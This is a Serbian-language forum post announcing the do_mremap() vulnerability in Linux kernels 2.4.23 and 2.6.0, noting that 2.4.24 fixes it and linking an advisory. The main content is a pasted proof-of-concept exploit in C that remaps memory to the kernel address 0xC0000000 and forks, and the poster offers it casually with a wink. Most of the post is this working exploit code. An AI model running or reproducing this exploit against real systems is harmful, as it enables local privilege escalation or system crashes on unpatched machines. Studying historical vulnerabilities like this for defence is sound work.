do_mremap() vulnerability in Linux kernel

do_mremap() vulnerability in Linux kernel

offline
  • AxeZ 
  • Legendarni građanin
  • Pridružio: 17 Apr 2003
  • Poruke: 3989
  • Gde živiš: Novi Sad, Vojvodina

Ovo moze dovesti do povecanja privilegija u 2.4.23 i 2.6.0 kernelima

Odmah je izasla 2.4.24 verzija kernela koja ispravlja ovaj problem.

Vise informacija ovde:
http://www.linuxsecurity.org/articles/host_security_article-8684.html

A evo ga i proof of concept exploit...Wink



/*
* Proof-of-concept exploit code for do_mremap()
*
* Copyright (C) 2004 Christophe Devine and Julien Tinnes
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software
* Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
*/

#include <asm/unistd.h>
#include <sys/mman.h>
#include <unistd.h>
#include <errno.h>

#define MREMAP_MAYMOVE 1
#define MREMAP_FIXED 2

#define __NR_real_mremap __NR_mremap

static inline _syscall5( void *, real_mremap, void *, old_address,
size_t, old_size, size_t, new_size,
unsigned long, flags, void *, new_address );

int main( void )
{
void *base;

base = mmap( NULL, 8192, PROT_READ | PROT_WRITE,
MAP_PRIVATE | MAP_ANONYMOUS, 0, 0 );

real_mremap( base, 0, 0, MREMAP_MAYMOVE | MREMAP_FIXED,
(void *) 0xC0000000 );

fork();

return( 0 );
}



Registruj se da bi učestvovao u diskusiji. Registrovanim korisnicima se NE prikazuju reklame unutar poruka.
Ko je trenutno na forumu
 

Ukupno su 690 korisnika na forumu :: 32 registrovanih, 3 sakrivenih i 655 gosta   ::   [ Administrator ] [ Supermoderator ] [ Moderator ] :: Detaljnije

Najviše korisnika na forumu ikad bilo je 3028 - dana 22 Nov 2019 07:47

Korisnici koji su trenutno na forumu:
Korisnici trenutno na forumu: _Petar, bankulen, brundo65, bulltony, Cufo, cvrle312, DENA, Djordje Todorovic, Eyes Wide Shut, Faki-Valjevo, goxin, Grzegorz, Insan, Krstić, lav23, Levi, LUDI, luka1978, miljannis, nradukic, nuke92, Outis, Panonsky, pavle_pzs2, radionica1, sakota79, Sale.S, saputnik plavetnila, Skywhaler, srbi, trutcina, Vlada1389